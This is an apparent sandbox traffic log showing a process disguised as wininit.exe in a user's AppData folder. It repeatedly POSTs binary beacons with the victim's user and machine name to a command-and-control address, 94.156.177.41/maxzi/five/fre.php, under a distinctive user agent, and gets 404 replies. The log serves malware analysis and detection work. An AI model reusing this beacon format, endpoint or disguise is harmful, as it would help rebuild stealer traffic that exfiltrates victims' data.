Nov 20, 2024 10:12:32.023730993 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 10:12:32.776916981 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:12:32 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.22	49230	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:12:32.967566013 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 20, 2024 10:12:32.972572088 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 10:12:33.728002071 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:12:33 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.22	49231	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:12:33.886928082 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 20, 2024 10:12:33.892076015 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 10:12:34.632595062 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:12:34 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.22	49232	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:12:34.769426107 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 20, 2024 10:12:34.777103901 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 10:12:35.505090952 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:12:35 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.22	49233	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:12:35.640115976 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 20, 2024 10:12:35.645215988 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 10:12:36.375921011 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:12:36 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.22	49234	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:12:36.515726089 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 20, 2024 10:12:36.520685911 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 10:12:37.246592045 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:12:37 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.22	49235	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:12:37.386193991 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 20, 2024 10:12:37.391331911 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 10:12:38.148303986 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:12:38 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.22	49236	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:12:38.290440083 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 20, 2024 10:12:38.295670033 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 10:12:39.034765005 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:12:38 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.22	49237	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:12:39.184828997 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 20, 2024 10:12:39.189868927 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 10:12:40.082314014 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:12:39 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.22	49238	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:12:40.229923010 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 20, 2024 10:12:40.238220930 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 10:12:40.998879910 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:12:40 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.22	49239	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:12:41.144229889 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 20, 2024 10:12:41.149833918 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 10:12:41.926178932 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:12:41 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
72	192.168.2.22	49240	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:12:42.070074081 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 20, 2024 10:12:42.075088978 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 10:12:42.939944983 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:12:42 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
73	192.168.2.22	49241	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:12:43.084049940 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 20, 2024 10:12:43.090775013 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 10:12:43.960422993 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:12:43 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.22	49242	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:12:44.314034939 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 20, 2024 10:12:44.335022926 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 10:12:45.162777901 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:12:45 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
75	192.168.2.22	49243	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:12:45.299447060 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 20, 2024 10:12:45.306056023 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 10:12:46.061624050 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:12:45 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.2.22	49244	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:12:46.221334934 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 20, 2024 10:12:46.228750944 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 10:12:46.951894999 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:12:46 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
77	192.168.2.22	49245	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:12:47.292335987 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 20, 2024 10:12:47.301018000 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 10:12:48.035159111 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:12:47 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
78	192.168.2.22	49246	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:12:48.193515062 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 20, 2024 10:12:48.198488951 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 10:12:48.943528891 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:12:48 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
79	192.168.2.22	49247	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:12:49.099790096 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 20, 2024 10:12:49.104815006 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 10:12:50.032990932 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:12:49 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
80	192.168.2.22	49248	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:12:50.254460096 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 20, 2024 10:12:50.259999037 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 10:12:50.995508909 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:12:50 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
81	192.168.2.22	49249	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:12:51.130161047 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 20, 2024 10:12:51.135097980 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 10:12:51.871305943 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Wed, 20 Nov 2024 09:12:51 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
82	192.168.2.22	49250	94.156.177.41	80	772	C:\Users\user\AppData\Roaming\wininit.exe

Timestamp	Bytes transferred	Direction	Data
Nov 20, 2024 10:12:52.054603100 CET	244	OUT	POST /maxzi/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 9D963662 Content-Length: 149 Connection: close
Nov 20, 2024 10:12:52.064243078 CET	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
